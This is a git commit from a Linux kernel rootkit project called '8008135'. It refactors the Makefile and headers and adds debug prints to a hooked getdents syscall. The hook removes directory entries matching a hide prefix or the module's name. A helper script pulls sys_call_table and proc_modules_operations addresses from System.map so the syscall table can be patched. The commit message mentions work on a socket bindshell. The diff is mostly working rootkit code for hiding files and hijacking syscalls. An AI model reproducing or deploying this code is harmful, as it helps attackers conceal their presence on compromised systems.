Changing Folder Structures and extending the Makefile for Needs

Added an 'src' dir with subfolders headers, include, libs Extending Makefile, so that all the Files get included for the build. Also adding the "load" option for make, which loads the module (has to be built before) as well as the "unload" option which unloads the module. The "all" option now automatically builds the sysgen.h from the script, it doesn't have to be executed in forehand anymore. Also, some Variables got added for better readability and changeability. After the socket bindshell didnt work so far, I added some DEBUG Kernel prints to debug the issue that sometimes the files to be hidden get displayed as "?" Also, a few Functions for debugging have been added - but I was too tired to add them to the collection and use them instead of ```printk```
5 years ago · 062fdebeae
parent 27b3fe226b
commit 062fdebeae
5 changed files with 176 additions and 59 deletions
--- a/40
+++ b/40
@ -1,6 +1,38 @@
-obj-m += 8008135.o
+# Module name
+MNAME := 8008135

-modules: 
-		make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
+# Build
+MODULEDIR	:= /lib/modules/$(shell uname -r)
+BUILDDIR	:= $(MODULEDIR)/build
+KERNELDIR 	:= $(MODULEDIR)/kernel
+
+# Source files
+SRCS_S 		:= src
+LIBS_S 		:= src/libs
+INCL_S 		:= src/include
+
+# Header files
+SRCS_H		:= $(PWD)/$(SRCS_S)/headers
+LIBS_H		:= $(PWD)/$(LIBS_S)/headers
+INCL_H		:= $(PWD)/$(INCL_S)/headers
+
+obj-m += $(MNAME).o
+# Core
+$(MNAME)-y 	+= src/$(MNAME).o
+
+# Includes for header files etc
+ccflags-y	:= -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H)
+
+all:
+	$(shell $(SRCS_S)/create_sysgen.sh)
+	$(MAKE) -C $(BUILDDIR) M=$(PWD) modules
+
+load:
+	insmod $(MNAME).ko
+	
+unload:
+	rmmod $(MNAME)
+	
 clean:
-		make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
+	-rm $(SRCS_H)/sysgen.h
+	$(MAKE) -C $(BUILDDIR) M=$(PWD) clean	
--- a/src/8008135.c
+++ b/src/8008135.c
@ -17,50 +17,9 @@
 * with this program.  If not, see <http://www.gnu.org/licenses/>.
 */

-/****  Includes  ***************************************************************
+/**** includes *****************************************************************
 *******************************************************************************/
-#include <linux/module.h>
-#include <linux/kernel.h>
-#include <linux/kallsyms.h>
-#include <asm/special_insns.h>
-#include <linux/string.h>
-#include <linux/fs.h>
-#include "sysgen.h"
-
-
-/****  Defines *****************************************************************
-*******************************************************************************/
-
-#define GETDENTS_SYSCALL_NUM	78
-#define WRITE_PROTECT_FLAG		(1<<16)
-
-#define HIDE_PREFIX				"8008135."
-#define HIDE_PREFIX_SZ			(sizeof(HIDE_PREFIX) - 1)
-
-#define MODULE_NAME				"8008135"
-#define MODULE_NAME_SZ			(sizeof(MODULE_NAME) - 1)
-
-/****  Modinfo  ****************************************************************
-*******************************************************************************/
-
-MODULE_LICENSE("GPLv3");             
-MODULE_AUTHOR("JanKoernerEnterprises");
-MODULE_DESCRIPTION("8008135");
-MODULE_VERSION("0.1");
-
-/****  type  *******************************************************************
-*******************************************************************************/
-struct linux_dirent {
-	unsigned long	d_ino;
-	unsigned long	d_off;
-	unsigned short	d_reclen;  // d_reclen is the way to tell the length of this entry
-	char		    d_name[1]; // the struct value is actually longer than this, and d_name is variable width.
-};
-
-typedef asmlinkage long (*sys_getdents_t)(unsigned int fd, 
-                                          struct linux_dirent __user *dirent, 
-                                          unsigned int count);
-
+#include "8008135.h"
 /****  var  ********************************************************************
 *******************************************************************************/

@ -72,8 +31,8 @@ sys_getdents_t sys_getdents_orig = NULL;
 *    PARAMETERS:  -
 *       RETURNS:  -
 *******************************************************************************/
-asmlinkage long sys_getdents_new(unsigned int fd, 
-                                 struct linux_dirent __user *dirent, 
+asmlinkage long sys_getdents_new(unsigned int fd,
+                                 struct linux_dirent __user *dirent,
                                 unsigned int count) {
 	int boff;
 	struct linux_dirent* ent;
@ -85,7 +44,7 @@ asmlinkage long sys_getdents_new(unsigned int fd,
 	if (ret <= 0) {
 		return ret;
 	}
-	
+
 	dbuf = (char*)dirent;

 	// go through the entries, looking for one that has our prefix
@ -96,12 +55,25 @@ asmlinkage long sys_getdents_new(unsigned int fd,
 		// if it has hide prefix or module name anywhere, hide it
 		if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0)
 			          || (strstr(ent->d_name, MODULE_NAME) != NULL)) {
-			
+#if defined DEBUG
+			printk("\n hide prefix or mod name contained!\n");
+			printk("\n ret %ld\n ", ret);
+			printk("\n dbuf %d\n" , dbuf);
+			printk("\n");
+			printk(ent->d_name);
+#endif
 			// remove this entry by copying everything after it forward
 			// and adjust the length reported
-			memcpy(dbuf + boff, dbuf + boff + ent->d_reclen, 
-			       ret - (boff + ent->d_reclen));			
+#if defined DEBUG
+			printk("\n reclen %u \n", ent->d_reclen);
+#endif
+			memcpy(dbuf + boff,
+				   dbuf + boff + ent->d_reclen,
+			       ret - (boff + ent->d_reclen));
 			ret -= ent->d_reclen;
+#if defined DEBUG
+			printk("\n ret after change %ld\n ", ret);
+#endif
 		} else {
 			// on to the next entry
 			boff += ent->d_reclen;
@ -155,7 +127,6 @@ static void __exit exit_8008135(void) {
 	printk(KERN_INFO "Old syscall back\n");
 }

-
 // Setting pointers to init-/exit-functions 
 module_init(init_8008135);
 module_exit(exit_8008135);
--- a/src/create_sysgen.sh
+++ b/src/create_sysgen.sh
@ -1,14 +1,19 @@
-#!/bin/bash
+#!/usr/bin/env bash
+SCRIPTPATH="$( cd "$(dirname "$0")" ; pwd -P )"
+SRCS_H="$SCRIPTPATH""/headers"
+SGENH="$SRCS_H""/sysgen.h"
+
 smap="/boot/System.map-$(uname -r)"

-echo -e "#pragma once" > ./sysgen.h
-echo -e "#include <linux/fs.h>" >> ./sysgen.h
+echo -e "#pragma once" > "$SGENH"
+echo -e "#include <linux/fs.h>" >> "$SGENH"

 symbline=$(cat $smap | grep '\Wsys_call_table$')
 set $symbline
-echo -e "void** sys_call_table = (void**)0x$1;" >> ./sysgen.h
+[ -z "$symbline" ] && echo "No SysCall Table Value from System.map found" && exit 2;
+echo -e "void** sys_call_table = (void**)0x$1;" >> "$SGENH"

 procline=$(cat $smap | grep '\Wproc_modules_operations$')
 set $procline

-echo -e "struct file_operations* proc_modules_operations = (struct file_operations*)0x$1;" >> ./sysgen.h
+echo -e "struct file_operations* proc_modules_operations = (struct file_operations*)0x$1;" >> "$SGENH"
--- a/src/headers/8008135.h
+++ b/src/headers/8008135.h
@ -0,0 +1,66 @@
+/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*-  */
+/*
+ * main.c
+ * Copyright (C) 2019
+ *
+ * 8008135 is free software: you can redistribute it and/or modify it
+ * under the terms of the GNU General Public License as published by the
+ * Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * 8008135 is distributed in the hope that it will be useful, but
+ * WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ * See the GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program.  If not, see <http://www.gnu.org/licenses/>.
+ */
+#ifndef SRC_HEADERS_8008135_H
+#define SRC_HEADERS_8008135_H
+/****  Includes  ***************************************************************
+*******************************************************************************/
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/kallsyms.h>
+#include <asm/special_insns.h>
+#include <linux/string.h>
+#include <linux/fs.h>
+#include "sysgen.h"
+
+
+/****  Defines *****************************************************************
+*******************************************************************************/
+
+#define GETDENTS_SYSCALL_NUM	78
+#define WRITE_PROTECT_FLAG		(1<<16)
+
+#define HIDE_PREFIX				"8008135."
+#define HIDE_PREFIX_SZ			(sizeof(HIDE_PREFIX) - 1)
+
+#define MODULE_NAME				"8008135"
+#define MODULE_NAME_SZ			(sizeof(MODULE_NAME) - 1)
+
+/****  Modinfo  ****************************************************************
+*******************************************************************************/
+
+MODULE_LICENSE("GPLv3");
+MODULE_AUTHOR("JanKoernerEnterprises");
+MODULE_DESCRIPTION("8008135");
+MODULE_VERSION("0.1");
+
+/****  type  *******************************************************************
+*******************************************************************************/
+struct linux_dirent {
+	unsigned long	d_ino;
+	unsigned long	d_off;
+	unsigned short	d_reclen;  // d_reclen is the way to tell the length of this entry
+	char		    d_name[1]; // the struct value is actually longer than this, and d_name is variable width.
+};
+
+typedef asmlinkage long (*sys_getdents_t)(unsigned int fd,
+                                          struct linux_dirent __user *dirent,
+                                          unsigned int count);
+
+
+#endif /* SRC_HEADERS_8008135_H */
--- a/src/include/headers/utils.h
+++ b/src/include/headers/utils.h
@ -0,0 +1,43 @@
+/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*-  */
+/*
+ * main.c
+ * Copyright (C) 2019
+ *
+ * 8008135 is free software: you can redistribute it and/or modify it
+ * under the terms of the GNU General Public License as published by the
+ * Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * 8008135 is distributed in the hope that it will be useful, but
+ * WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ * See the GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program.  If not, see <http://www.gnu.org/licenses/>.
+ */
+
+/****  Debugging ***************************************************************
+*******************************************************************************/
+
+#ifndef SRC_INCLUDE__HEADERS_UTILS_H_
+#define SRC_INCLUDE_HEADERS_UTILS_H_
+#define DEBUG_ENABLED 1
+
+/****  Debugging ***************************************************************
+*******************************************************************************/
+
+/* variadic macro for debug messages */
+#define debug(str, ...) 					\
+if (DEBUG_ENABLED) {			 			\
+	pr_info("[ 8008135 ] [ %s ] " str "\n", 		\
+		__func__, ##__VA_ARGS__); 			\
+}
+
+#define alert(str, ...) 					\
+if (DEBUG_ENABLED) { 						\
+	pr_warn("[ 8008135 ] [ %s ] " str "\n", 		\
+		__func__, ##__VA_ARGS__); 			\
+}
+
+#endif /* SRC_INCLUDE_HEADERS_UTILS_H_ */